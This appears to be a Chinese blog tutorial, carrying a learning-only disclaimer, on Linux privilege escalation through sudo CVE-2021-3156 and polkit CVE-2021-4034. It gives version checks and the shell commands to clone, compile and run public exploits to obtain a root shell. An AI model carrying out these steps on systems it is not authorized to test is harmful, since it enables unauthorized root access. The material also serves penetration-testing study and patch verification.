赞
踩
免责声明:本文仅做技术学习与交流...
目录
another: SUDO权限配置不当.
由系统的内核和发布版本等等决定...(版本符合基本就拿下)
sudo: 1.8.2 - 1.8.31p2
sudo: 1.9.0 - 1.9.5p1
sudo 命令 sudo --version
1-sudo版本判断.
2-命令报错判断:
sudoedit -s / --报错则存在漏洞.
- git clone https://github.com/blasty/CVE-2021-3156.git
- cd CVE-2021-3156
- make
- chmod a+x sudo-hax-me-a-sandwich
-
- uname -a #查看内核版本
- id
- #最后的参数自己选:
- ./sudo-hax-me-a-sandwich 1
- -->提权之后的会话就是root权限了
-
vulhub/polkit/CVE-2021-4034/README.zh-cn.md at master · vulhub/vulhub · GitHub
漏洞影响2009年5月至今的所有polkit版本.
由于polkit是系统预装工具,所有存在polkit的linux系统均受影响
如:CentOS、Ubuntu、Debian、Redhat、Fedora、Gentoo、Mageia等
dpkg -l policykit-1
--有信息就是有.
git clone https://github.com/berdav/CVE-2021-4034.git
--没有git命令就自己上传.或wget命令
yum install git
- cd CVE-2021-4034/
-
- make
-
- ./cve-2021-4034
-
- id
---判断一下--发现没有--->上来就直接干
--上传--打开时用到的权限还是test的,所以就不要直接上传,用wget...
--运行之后没有结果就GG...
useradd -d /home/test -m test
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。